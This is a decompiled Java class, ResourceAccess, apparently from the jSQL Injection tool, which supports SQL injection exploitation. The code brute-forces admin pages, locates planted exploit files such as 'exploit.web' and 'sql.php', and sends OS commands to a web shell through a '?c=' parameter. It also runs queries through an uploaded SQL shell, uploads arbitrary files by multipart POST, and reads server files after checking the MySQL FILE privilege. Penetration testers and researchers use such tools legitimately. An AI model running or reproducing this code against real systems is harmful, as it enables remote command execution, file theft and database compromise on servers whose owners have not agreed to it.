/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.CallableFile;
import com.jsql.model.accessible.CallableHttpHead;
import com.jsql.model.accessible.vendor.ExploitDerby;
import com.jsql.model.accessible.vendor.ExploitH2;
import com.jsql.model.accessible.vendor.ExploitHsqldb;
import com.jsql.model.accessible.vendor.ExploitMysql;
import com.jsql.model.accessible.vendor.ExploitOracle;
import com.jsql.model.accessible.vendor.ExploitPostgres;
import com.jsql.model.accessible.vendor.ExploitSqlite;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.bean.util.Header;
import com.jsql.model.bean.util.Interaction;
import com.jsql.model.bean.util.Request;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.ConnectionUtil;
import com.jsql.util.LogLevelUtil;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.lang.invoke.CallSite;
import java.net.URI;
import java.net.URLEncoder;
import java.net.http.HttpHeaders;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.time.Duration;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.EnumMap;
import java.util.List;
import java.util.UUID;
import java.util.concurrent.CompletionService;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.ExecutorCompletionService;
import java.util.concurrent.ExecutorService;
import java.util.function.BinaryOperator;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class ResourceAccess {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private boolean isSearchAdminStopped = false;
    private boolean isScanStopped = false;
    private boolean isSearchFileStopped = false;
    private final List<CallableFile> callablesReadFile = new ArrayList<CallableFile>();
    private final InjectionModel injectionModel;
    private final ExploitSqlite exploitSqlite;
    private final ExploitMysql exploitMysql;
    private final ExploitOracle exploitOracle;
    private final ExploitPostgres exploitPostgres;
    private final ExploitHsqldb exploitHsqldb;
    private final ExploitH2 exploitH2;
    private final ExploitDerby exploitDerby;
    public static final String WEB_CONFIRM_CMD = URLEncoder.encode("expr 133707330 + 10001", StandardCharsets.ISO_8859_1);
    public static final String WEB_CONFIRM_RESULT = "133717331";
    public static final String SQL_CONFIRM_CMD = "select 1337";
    public static final String SQL_CONFIRM_RESULT = "| 1337 |";
    public static final String SQL_DOT_PHP = "sql.php";
    public static final String EXPLOIT_DOT_UPL = "exploit.upl";
    public static final String EXPLOIT_DOT_WEB = "exploit.web";
    public static final String UPLOAD_SUCCESSFUL = "Upload successful: ack received for {}{}";
    public static final String UPLOAD_FAILURE = "Upload failure: missing ack for {}{}";
    public static final String LOID_NOT_FOUND = "Exploit loid not found";
    public static final String ADD_LOID = "loid#create";
    public static final String WRITE_LOID = "loid#write";
    public static final String READ_LOID = "loid#read";
    public static final String DROP_FUNC = "func#drop";
    public static final String ADD_FUNC = "body#add-func";
    public static final String RUN_FUNC = "body#run-func";
    public static final String BODY_CONFIRM = "body#confirm";
    public static final String UDF_RUN_CMD = "udf#run-cmd";
    public static final String TBL_CREATE = "tbl#create";
    public static final String TBL_FILL = "tbl#fill";
    public static final String TBL_DUMP = "tbl#dump";
    public static final String TBL_DROP = "tbl#drop";
    public static final String TBL_READ = "tbl#read";
    public static final String FILE_READ = "file#read";
    public static final String TEMPLATE_ERROR = "Command failure: %s\nTry '%s 2>&1' to get a system error message.\n";

    public ResourceAccess(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        this.exploitSqlite = new ExploitSqlite(injectionModel);
        this.exploitMysql = new ExploitMysql(injectionModel);
        this.exploitOracle = new ExploitOracle(injectionModel);
        this.exploitPostgres = new ExploitPostgres(injectionModel);
        this.exploitHsqldb = new ExploitHsqldb(injectionModel);
        this.exploitH2 = new ExploitH2(injectionModel);
        this.exploitDerby = new ExploitDerby(injectionModel);
    }

    public int createAdminPages(String urlInjection, List<String> pageNames) {
        int tasksHandled;
        String[] folderNames;
        Matcher matcher = Pattern.compile("^((https?://)?[^/]*)(.*)").matcher(urlInjection);
        matcher.find();
        String urlProtocol = matcher.group(1);
        String urlWithoutProtocol = matcher.group(3);
        ArrayList<CallSite> folderSplits = new ArrayList<CallSite>();
        if (urlWithoutProtocol.isEmpty() || !Pattern.matches("^/.*", urlWithoutProtocol)) {
            urlWithoutProtocol = "/dummy";
        }
        String[] splits = urlWithoutProtocol.split("/", -1);
        for (String folderName : folderNames = Arrays.copyOf(splits, splits.length - 1)) {
            folderSplits.add((CallSite)((Object)((String)folderName + "/")));
        }
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableGetAdminPage");
        ExecutorCompletionService<CallableHttpHead> taskCompletionService = new ExecutorCompletionService<CallableHttpHead>(taskExecutor);
        StringBuilder urlPart = new StringBuilder();
        for (String string : folderSplits) {
            urlPart.append(string);
            for (String pageName : pageNames) {
                taskCompletionService.submit(new CallableHttpHead(urlProtocol + urlPart + pageName, this.injectionModel, "check:page"));
            }
        }
        int nbAdminPagesFound = 0;
        int n = folderSplits.size() * pageNames.size();
        for (tasksHandled = 0; tasksHandled < n && !this.isSearchAdminStopped(); ++tasksHandled) {
            nbAdminPagesFound = this.callAdminPage(taskCompletionService, nbAdminPagesFound);
        }
        this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor);
        this.isSearchAdminStopped = false;
        this.logSearchAdminPage(nbAdminPagesFound, n, tasksHandled);
        return nbAdminPagesFound;
    }

    public int callAdminPage(CompletionService<CallableHttpHead> taskCompletionService, int nbAdminPagesFound) {
        int nbAdminPagesFoundFixed = nbAdminPagesFound;
        try {
            CallableHttpHead currentCallable = taskCompletionService.take().get();
            if (currentCallable.isHttpResponseOk()) {
                Request request = new Request();
                request.setMessage(Interaction.CREATE_ADMIN_PAGE_TAB);
                request.setParameters(currentCallable.getUrl());
                this.injectionModel.sendToViews(request);
                ++nbAdminPagesFoundFixed;
                LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Found page: {}", (Object)currentCallable.getUrl());
            }
        }
        catch (InterruptedException e) {
            LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
            Thread.currentThread().interrupt();
        }
        catch (ExecutionException e) {
            LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, (Throwable)e);
        }
        return nbAdminPagesFoundFixed;
    }

    public void logSearchAdminPage(int nbAdminPagesFound, int submittedTasks, int tasksHandled) {
        String result = String.format("Searched %s/%s page%s: %s found", tasksHandled, submittedTasks, tasksHandled > 1 ? Character.valueOf('s') : "", nbAdminPagesFound);
        if (nbAdminPagesFound > 0) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, result);
        } else {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, result);
        }
    }

    public String checkUrls(String urlExploit, String nameExploit, BinaryOperator<String> biFuncGetRequest) {
        String urlWithoutProtocol;
        String url;
        Object urlExploitFixed = urlExploit;
        if (!((String)urlExploitFixed).isEmpty()) {
            urlExploitFixed = ((String)urlExploitFixed).replaceAll("/*$", "") + "/";
        }
        if (StringUtils.isEmpty(url = urlExploitFixed)) {
            url = this.injectionModel.getMediatorUtils().getConnectionUtil().getUrlBase();
        }
        String urlProtocol = "/".equals(urlWithoutProtocol = url.replaceAll("^https?://[^/]*", "")) ? url.replaceAll("/+$", "") : url.replace(urlWithoutProtocol, "");
        ArrayList<String> directoryNames = new ArrayList<String>();
        String urlWithoutFileName = urlWithoutProtocol.replaceAll("[^/]*$", "").replaceAll("/+", "/");
        if (urlWithoutFileName.split("/").length == 0) {
            directoryNames.add("/");
        }
        for (String directoryName : urlWithoutFileName.split("/")) {
            directoryNames.add(directoryName + "/");
        }
        String urlSuccess = this.getExploitUrl(nameExploit, directoryNames, urlProtocol);
        if (urlSuccess != null) {
            urlSuccess = (String)biFuncGetRequest.apply(nameExploit, urlSuccess);
        } else {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit access failure: connection URL not found");
        }
        return urlSuccess;
    }

    private String getExploitUrl(String filename, List<String> directoryNames, String urlProtocol) {
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableGetExploitUrl");
        ExecutorCompletionService<CallableHttpHead> taskCompletionService = new ExecutorCompletionService<CallableHttpHead>(taskExecutor);
        StringBuilder urlPart = new StringBuilder();
        for (String segment : directoryNames) {
            urlPart.append(segment);
            taskCompletionService.submit(new CallableHttpHead(urlProtocol + urlPart + filename, this.injectionModel, "xplt#confirm-url"));
        }
        String urlSuccess = null;
        int submittedTasks = directoryNames.size();
        for (int tasksHandled = 0; tasksHandled < submittedTasks; ++tasksHandled) {
            try {
                CallableHttpHead currentCallable = (CallableHttpHead)taskCompletionService.take().get();
                if (!currentCallable.isHttpResponseOk()) continue;
                urlSuccess = currentCallable.getUrl();
                LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Connection successful to [{}]", (Object)currentCallable.getUrl());
                break;
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
                continue;
            }
            catch (ExecutionException e) {
                LOGGER.log(LogLevelUtil.CONSOLE_JAVA, e, (Throwable)e);
            }
        }
        this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor);
        return urlSuccess;
    }

    public String callCommand(String urlCommand) {
        return this.callCommand(urlCommand, false);
    }

    public String callCommand(String urlCommand, boolean isConnectIssueIgnored) {
        String result;
        block4: {
            String pageSource;
            try {
                pageSource = this.injectionModel.getMediatorUtils().getConnectionUtil().getSource(urlCommand, isConnectIssueIgnored);
            }
            catch (Exception e) {
                pageSource = "";
            }
            Matcher regexSearch = Pattern.compile("(?s)<SqLi>(.*?)<iLQS>").matcher(pageSource);
            regexSearch.find();
            try {
                result = regexSearch.group(1);
            }
            catch (IllegalStateException e) {
                result = "";
                if (isConnectIssueIgnored) break block4;
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, String.format(TEMPLATE_ERROR, "empty result", "command"));
            }
        }
        return result;
    }

    public String runWebShell(String command, UUID uuidShell, String urlExploit) {
        return this.runWebShell(command, uuidShell, urlExploit, false);
    }

    public String runWebShell(String command, UUID uuidShell, String urlExploit, boolean isConnectIssueIgnored) {
        String result = this.callCommand(urlExploit + "?c=" + URLEncoder.encode(command, StandardCharsets.ISO_8859_1), isConnectIssueIgnored);
        if (StringUtils.isBlank(result)) {
            result = String.format(TEMPLATE_ERROR, "empty result", command);
        }
        Request request = new Request();
        request.setMessage(Interaction.GET_TERMINAL_RESULT);
        request.setParameters(uuidShell, result);
        this.injectionModel.sendToViews(request);
        return result;
    }

    public String runSqlShell(String command, UUID uuidShell, String urlExploit, String username, String password) {
        return this.runSqlShell(command, uuidShell, urlExploit, username, password, true);
    }

    public String runSqlShell(String command, UUID uuidShell, String urlExploit, String username, String password, boolean isResultSentToView) {
        Object result = this.callCommand(String.format("%s?q=%s&u=%s&p=%s", urlExploit, URLEncoder.encode(command, StandardCharsets.ISO_8859_1), username, password));
        if (((String)result).contains("<SQLr>")) {
            List<List<String>> listRows = this.parse((String)result);
            if (listRows.isEmpty()) {
                result = "Result not found: check your credentials or review logs in tab Network\n";
            } else {
                List<Integer> listFieldsLength = this.parseColumnLength(listRows);
                result = this.convert(listRows, listFieldsLength);
            }
        } else if (((String)result).contains("<SQLm>")) {
            result = ((String)result).replace("<SQLm>", "") + "\n";
        } else if (((String)result).contains("<SQLe>")) {
            result = ((String)result).replace("<SQLe>", "") + "\n";
        }
        if (isResultSentToView) {
            Request request = new Request();
            request.setMessage(Interaction.GET_TERMINAL_RESULT);
            request.setParameters(uuidShell, result, command);
            this.injectionModel.sendToViews(request);
        }
        return result;
    }

    private String convert(List<List<String>> listRows, List<Integer> listFieldsLength) {
        StringBuilder tableText = new StringBuilder("+");
        for (Integer n : listFieldsLength) {
            tableText.append("-").append(StringUtils.repeat("-", (int)n)).append("-+");
        }
        tableText.append("\n");
        for (List list : listRows) {
            tableText.append("|");
            int cursorPosition = 0;
            for (String field : list) {
                tableText.append(" ").append(field).append(StringUtils.repeat(" ", listFieldsLength.get(cursorPosition) - field.length())).append(" |");
                ++cursorPosition;
            }
            tableText.append("\n");
        }
        tableText.append("+");
        for (Integer n : listFieldsLength) {
            tableText.append("-").append(StringUtils.repeat("-", (int)n)).append("-+");
        }
        tableText.append("\n");
        return tableText.toString();
    }

    private List<Integer> parseColumnLength(List<List<String>> listRows) {
        ArrayList<Integer> listFieldsLength = new ArrayList<Integer>();
        for (int indexLongestRowSearch = 0; indexLongestRowSearch < listRows.get(0).size(); ++indexLongestRowSearch) {
            int indexLongestRowSearchFinal = indexLongestRowSearch;
            listRows.sort((firstRow, secondRow) -> ((String)secondRow.get(indexLongestRowSearchFinal)).length() - ((String)firstRow.get(indexLongestRowSearchFinal)).length());
            listFieldsLength.add(listRows.get(0).get(indexLongestRowSearch).length());
        }
        return listFieldsLength;
    }

    private List<List<String>> parse(String result) {
        ArrayList<List<String>> listRows = new ArrayList<List<String>>();
        Matcher rowsMatcher = Pattern.compile("(?si)<tr>(<td>.*?</td>)</tr>").matcher(result);
        while (rowsMatcher.find()) {
            String values = rowsMatcher.group(1);
            Matcher fieldsMatcher = Pattern.compile("(?si)<td>(.*?)</td>").matcher(values);
            ArrayList<String> listFields = new ArrayList<String>();
            listRows.add(listFields);
            while (fieldsMatcher.find()) {
                String field = fieldsMatcher.group(1);
                listFields.add(field);
            }
        }
        return listRows;
    }

    public HttpResponse<String> upload(File file, String url, InputStream streamToUpload) throws IOException, JSqlException, InterruptedException {
        String crLf = "\r\n";
        String boundary = "---------------------------4664151417711";
        byte[] streamData = new byte[streamToUpload.available()];
        if (streamToUpload.read(streamData) == -1) {
            throw new JSqlException("Error reading the file");
        }
        Object headerForm = "";
        headerForm = (String)headerForm + "--" + boundary + crLf;
        headerForm = (String)headerForm + "Content-Disposition: form-data; name=\"u\"; filename=\"" + file.getName() + "\"" + crLf;
        headerForm = (String)headerForm + "Content-Type: binary/octet-stream" + crLf;
        headerForm = (String)headerForm + crLf;
        Object headerFile = "";
        headerFile = (String)headerFile + crLf + "--" + boundary + "--" + crLf;
        HttpRequest httpRequest = HttpRequest.newBuilder().uri(URI.create(url)).timeout(Duration.ofSeconds(15L)).POST(HttpRequest.BodyPublishers.ofByteArrays(Arrays.asList(((String)headerForm).getBytes(StandardCharsets.UTF_8), Files.readAllBytes(Paths.get(file.toURI())), ((String)headerFile).getBytes(StandardCharsets.UTF_8)))).setHeader("Content-Type", "multipart/form-data; boundary=" + boundary).build();
        HttpResponse<String> response = this.injectionModel.getMediatorUtils().getConnectionUtil().getHttpClient().build().send(httpRequest, HttpResponse.BodyHandlers.ofString());
        HttpHeaders httpHeaders = response.headers();
        String pageSource = response.body();
        EnumMap<Header, Object> msgHeader = new EnumMap<Header, Object>(Header.class);
        msgHeader.put(Header.URL, url);
        msgHeader.put(Header.HEADER, ConnectionUtil.getHeadersMap(httpRequest.headers()));
        msgHeader.put(Header.RESPONSE, ConnectionUtil.getHeadersMap(httpHeaders));
        msgHeader.put(Header.SOURCE, pageSource);
        msgHeader.put(Header.METADATA_PROCESS, "upl#multipart");
        Request request = new Request();
        request.setMessage(Interaction.MESSAGE_HEADER);
        request.setParameters(msgHeader);
        this.injectionModel.sendToViews(request);
        return response;
    }

    public boolean isMysqlReadDenied() throws JSqlException {
        String[] sourcePage = new String[]{""};
        String resultInjection = new SuspendableGetRows(this.injectionModel).run(this.injectionModel.getResourceAccess().getExploitMysql().getModelYaml().getFile().getPrivilege(), sourcePage, false, 1, MockElement.MOCK, "privilege");
        boolean readingIsAllowed = false;
        if (StringUtils.isEmpty(resultInjection)) {
            this.injectionModel.sendResponseFromSite("Can't read privilege", sourcePage[0].trim());
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
        } else if ("false".equals(resultInjection)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Privilege FILE not granted: files not readable by current user");
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_INVULNERABLE);
            this.injectionModel.sendToViews(request);
        } else {
            Request request = new Request();
            request.setMessage(Interaction.MARK_FILE_SYSTEM_VULNERABLE);
            this.injectionModel.sendToViews(request);
            readingIsAllowed = true;
        }
        return !readingIsAllowed;
    }

    public List<String> readFile(List<String> pathsFiles) throws JSqlException, InterruptedException, ExecutionException {
        int tasksHandled;
        if (this.injectionModel.getMediatorVendor().getVendor() == this.injectionModel.getMediatorVendor().getMysql() && this.isMysqlReadDenied()) {
            return Collections.emptyList();
        }
        int countFileFound = 0;
        ArrayList<String> results = new ArrayList<String>();
        ExecutorService taskExecutor = this.injectionModel.getMediatorUtils().getThreadUtil().getExecutor("CallableReadFile");
        ExecutorCompletionService<CallableFile> taskCompletionService = new ExecutorCompletionService<CallableFile>(taskExecutor);
        for (String pathFile : pathsFiles) {
            CallableFile callableFile = new CallableFile(pathFile, this.injectionModel);
            taskCompletionService.submit(callableFile);
            this.callablesReadFile.add(callableFile);
        }
        ArrayList<String> duplicate = new ArrayList<String>();
        int submittedTasks = pathsFiles.size();
        for (tasksHandled = 0; tasksHandled < submittedTasks && !this.isSearchFileStopped; ++tasksHandled) {
            CallableFile currentCallable = (CallableFile)taskCompletionService.take().get();
            if (!StringUtils.isNotEmpty(currentCallable.getSourceFile())) continue;
            String name = currentCallable.getPathFile().substring(currentCallable.getPathFile().lastIndexOf(47) + 1);
            String content = currentCallable.getSourceFile();
            String path = currentCallable.getPathFile();
            Request request = new Request();
            request.setMessage(Interaction.CREATE_FILE_TAB);
            request.setParameters(name, content, path);
            this.injectionModel.sendToViews(request);
            if (!duplicate.contains(path.replace(name, ""))) {
                LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Folder exploit candidate: {}", () -> path.replace(name, ""));
            }
            duplicate.add(path.replace(name, ""));
            results.add(content);
            ++countFileFound;
        }
        for (CallableFile callableReadFile : this.callablesReadFile) {
            callableReadFile.getSuspendableReadFile().stop();
        }
        this.callablesReadFile.clear();
        this.injectionModel.getMediatorUtils().getThreadUtil().shutdown(taskExecutor);
        this.isSearchFileStopped = false;
        String result = String.format("Searched %s/%s file%s: %s found", tasksHandled, submittedTasks, tasksHandled > 1 ? Character.valueOf('s') : "", countFileFound);
        if (countFileFound > 0) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, result);
        } else {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, result);
        }
        return results;
    }

    public String getResult(String query, String metadata) throws JSqlException {
        String[] sourcePage = new String[]{""};
        return new SuspendableGetRows(this.injectionModel).run(query, sourcePage, false, 0, MockElement.MOCK, metadata);
    }

    public String getResultWithCatch(String query, String metadata) {
        String[] sourcePage = new String[]{""};
        try {
            return new SuspendableGetRows(this.injectionModel).run(query, sourcePage, false, 0, MockElement.MOCK, metadata);
        }
        catch (JSqlException ignored) {
            return "";
        }
    }

    public void stopSearchFile() {
        this.isSearchFileStopped = true;
        for (CallableFile callable : this.callablesReadFile) {
            callable.getSuspendableReadFile().stop();
        }
    }

    public void stopSearchAdmin() {
        this.isSearchAdminStopped = true;
    }

    public ExploitSqlite getExploitSqlite() {
        return this.exploitSqlite;
    }

    public ExploitMysql getExploitMysql() {
        return this.exploitMysql;
    }

    public ExploitOracle getExploitOracle() {
        return this.exploitOracle;
    }

    public ExploitPostgres getExploitPostgres() {
        return this.exploitPostgres;
    }

    public boolean isSearchAdminStopped() {
        return this.isSearchAdminStopped;
    }

    public void setScanStopped(boolean isScanStopped) {
        this.isScanStopped = isScanStopped;
    }

    public boolean isScanStopped() {
        return this.isScanStopped;
    }

    public ExploitHsqldb getExploitHsqldb() {
        return this.exploitHsqldb;
    }

    public ExploitH2 getExploitH2() {
        return this.exploitH2;
    }

    public ExploitDerby getExploitDerby() {
        return this.exploitDerby;
    }
}

